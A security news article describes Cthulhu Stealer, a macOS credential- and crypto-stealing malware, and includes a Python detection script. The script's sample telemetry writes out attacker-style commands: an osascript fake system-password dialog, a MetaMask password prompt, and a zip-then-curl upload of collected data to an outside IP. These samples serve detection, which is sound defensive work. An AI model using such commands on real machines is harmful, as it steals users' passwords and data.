Cthulhu Stealer: New macOS Malware Targets Credentials and Cryptocurrency

Cybersecurity researchers have identified a new information-stealing malware targeting Apple macOS systems, highlighting the growing focus of threat actors on the operating system.

Known as Cthulhu Stealer, this malware has been offered as malware-as-a-service (MaaS) for $500 per month since late 2023. It can target both x86_64 and Arm architectures.

"Cthulhu Stealer is an Apple disk image (DMG) that is bundled with two binaries, depending on the architecture," said Tara Gould, a researcher at Cato Security. "The malware is written in Golang and disguises itself as legitimate software."

The malware impersonates several software programs, including CleanMyMac, Grand Theft Auto IV, and Adobe GenP—an open-source tool that bypasses Adobe's Creative Cloud service to activate apps without a serial key.

The DMG is unsigned, so Gatekeeper blocks it by default; users who override that protection and run it are then shown a dialog asking for their system password. The dialog is produced with osascript (the AppleScript command-line runner), the same fake-prompt technique used by other macOS stealers such as Atomic Stealer, Cuckoo, MacStealer, and Banshee Stealer.

The next step is a second prompt asking for the user's MetaMask password. Cthulhu Stealer also collects system information and dumps Keychain passwords with Chainbreaker, an open-source keychain-extraction tool; the system password harvested in the first prompt is what lets it decrypt the keychain database.

The stolen data, which includes web browser cookies and Telegram account information, is compressed into a ZIP file and then sent to a command-and-control (C2) server. "The main functionality of Cthulhu Stealer is to steal credentials and cryptocurrency wallets from various stores, including game accounts," Gould noted.
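The two behaviours described above, a fake osascript password dialog followed by the collected data being zipped and sent off-host, are what a detection engineer would key on. The following is an added example, not code from the article or from Cato's research: it scans constructed, EDR-style process-execution events (the JSON field names, the dialog wording and the zip/curl command lines are assumptions for this example) for an osascript "display dialog" with a hidden answer field, and then correlates a later archive-and-upload step under the same parent process into a single higher-confidence finding.

```python
"""Flag osascript credential prompts and a prompt -> archive -> upload chain.

Added example (not from the article or Cato Security). Field names in the
sample telemetry and the exact dialog strings are assumptions.
"""
import json
import re
from dataclasses import dataclass

# Constructed sample telemetry, one JSON object per line. Events 501-504 share
# parent 498 (a stealer-like chain); 610-611 are benign osascript uses.
SAMPLE_EVENTS = r'''
{"ts":"2024-08-20T10:01:02Z","pid":501,"ppid":498,"user":"alice","exe":"/usr/bin/osascript","cmdline":"osascript -e 'display dialog \"System Preferences wants to make changes. Enter your password.\" default answer \"\" with icon caution buttons {\"OK\"} default button \"OK\" with hidden answer'"}
{"ts":"2024-08-20T10:01:09Z","pid":502,"ppid":498,"user":"alice","exe":"/usr/bin/osascript","cmdline":"osascript -e 'display dialog \"Enter your MetaMask password\" default answer \"\" with hidden answer'"}
{"ts":"2024-08-20T10:01:20Z","pid":503,"ppid":498,"user":"alice","exe":"/usr/bin/zip","cmdline":"zip -r /var/folders/zz/T/out.zip /var/folders/zz/T/collected"}
{"ts":"2024-08-20T10:01:25Z","pid":504,"ppid":498,"user":"alice","exe":"/usr/bin/curl","cmdline":"curl -s -F file=@/var/folders/zz/T/out.zip http://198.51.100.7:8080/upload"}
{"ts":"2024-08-20T10:05:00Z","pid":610,"ppid":600,"user":"alice","exe":"/usr/bin/osascript","cmdline":"osascript -e 'display notification \"Build finished\" with title \"CI\"'"}
{"ts":"2024-08-20T10:06:00Z","pid":611,"ppid":600,"user":"alice","exe":"/usr/bin/osascript","cmdline":"osascript -e 'display dialog \"Delete the cache?\" buttons {\"No\",\"Yes\"}'"}
'''

DIALOG_RE = re.compile(r"display\s+dialog", re.I)
HIDDEN_RE = re.compile(r"\bhidden\s+answer\b", re.I)        # password-style text field
PASSWORD_RE = re.compile(r"password|passphrase|keychain", re.I)
ARCHIVE_EXES = {"/usr/bin/zip", "/usr/bin/ditto", "/usr/bin/tar"}
UPLOAD_EXES = {"/usr/bin/curl"}


@dataclass
class Finding:
    pid: int      # offending process, or the parent pid for a chain finding
    rule: str
    detail: str


def parse_events(text):
    """Parse newline-delimited JSON process events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_credential_prompt(cmdline):
    """True when an osascript command shows a dialog with a hidden input field."""
    return bool(DIALOG_RE.search(cmdline) and HIDDEN_RE.search(cmdline))


def scan(events):
    """Return per-process findings plus one chain finding per suspicious parent."""
    events = sorted(events, key=lambda e: e["ts"])   # ISO timestamps sort lexically
    findings = []
    first_prompt, archived, uploaded = {}, {}, {}
    for ev in events:
        exe, cmd, ppid = ev["exe"], ev["cmdline"], ev["ppid"]
        if exe.endswith("/osascript") and is_credential_prompt(cmd):
            rule = ("osascript_hidden_answer_password" if PASSWORD_RE.search(cmd)
                    else "osascript_hidden_answer")
            findings.append(Finding(ev["pid"], rule, cmd[:90]))
            first_prompt.setdefault(ppid, ev["ts"])
        elif ppid in first_prompt and exe in ARCHIVE_EXES:   # only after a prompt
            archived[ppid] = ev["ts"]
        elif ppid in first_prompt and exe in UPLOAD_EXES:
            uploaded[ppid] = ev["ts"]
    for ppid in first_prompt:
        if ppid in archived and ppid in uploaded and archived[ppid] <= uploaded[ppid]:
            findings.append(Finding(ppid, "stealer_chain",
                                    f"parent {ppid}: hidden-answer prompt, then archive, then upload"))
    return findings


if __name__ == "__main__":
    for f in scan(parse_events(SAMPLE_EVENTS)):
        print(f"{f.rule:34} pid={f.pid:<5} {f.detail}")
```

The hidden-answer check alone will fire on a few legitimate admin scripts, which is why the chain rule exists: a parent that shows a password dialog and then, in order, archives a directory and pushes it out with curl is the sequence the article describes, and it is worth paging on even when the individual commands look ordinary. On a real fleet the exe set for archiving and upload should be extended to whatever the endpoint agent sees (ditto, tar, nscurl, a Go binary doing its own HTTP), and the parent linkage should follow the process tree rather than a single ppid.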

"The functionality and features of Cthulhu Stealer are very similar to Atomic Stealer, indicating the developer of Cthulhu Stealer probably took Atomic Stealer and modified the code. The use of osascript to prompt the user for their password is similar in Atomic Stealer and Cthulhu, even including the same spelling mistakes."

The threat actors behind Cthulhu Stealer are reportedly no longer active, partly due to disputes over payments that led to accusations of exit scams by affiliates. This resulted in the main developer being banned permanently from a cybercrime marketplace where the stealer was advertised.

Despite its capabilities, Cthulhu Stealer has no anti-analysis or evasion features, and nothing that distinguishes it from the other stealer offerings in the cybercriminal underground.

Although macOS is targeted less often than Windows and Linux, users are advised to download software only from trusted sources, not to install unverified apps, and to keep their systems current with the latest security patches. Note that a stealer of this kind does not exploit a software vulnerability; it depends on the user overriding Gatekeeper and typing a password into a dialog, so patching alone does not stop it.

Apple has acknowledged the rise in macOS malware and recently announced updates to its operating system aimed at enhancing security. The next version, macOS Sequoia, will introduce more stringent checks when opening software that isn’t correctly signed or notarized.

"In macOS Sequoia, users will no longer be able to Control-click to override Gatekeeper when opening software that isn't signed correctly or notarized," Apple stated. "They'll need to visit System Settings > Privacy & Security to review security information for software before allowing it to run."


Reference: www.thehackernews.com

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067